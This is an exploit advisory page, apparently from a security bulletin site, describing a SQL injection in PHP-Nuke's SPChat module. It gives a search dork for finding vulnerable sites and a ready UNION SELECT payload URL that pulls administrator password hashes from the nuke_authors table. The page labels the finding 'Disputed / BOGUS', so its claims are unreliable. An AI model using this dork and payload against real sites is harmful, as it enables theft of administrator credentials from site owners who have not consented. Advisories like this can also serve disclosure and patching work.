Disputed / BOGUS

PHP-Nuke SPChat SQL Injection

Published
Credit
Risk
2012.07.21
inurl:name=SPChat
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

## Owner : Pr0T3cT10n
## Script site : http://www.phpnuke.org
## Script name : PHP-Nuke module(SPChat)
## Version : All
## Type : SQL Injection
## D0rk : inurl:name=SPChat

## Description :
## Pull out user details from the database

## Vuln :
## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]
## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1

## NOTE :
## You need to be a regular user

References:

http://www.phpnuke.org


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com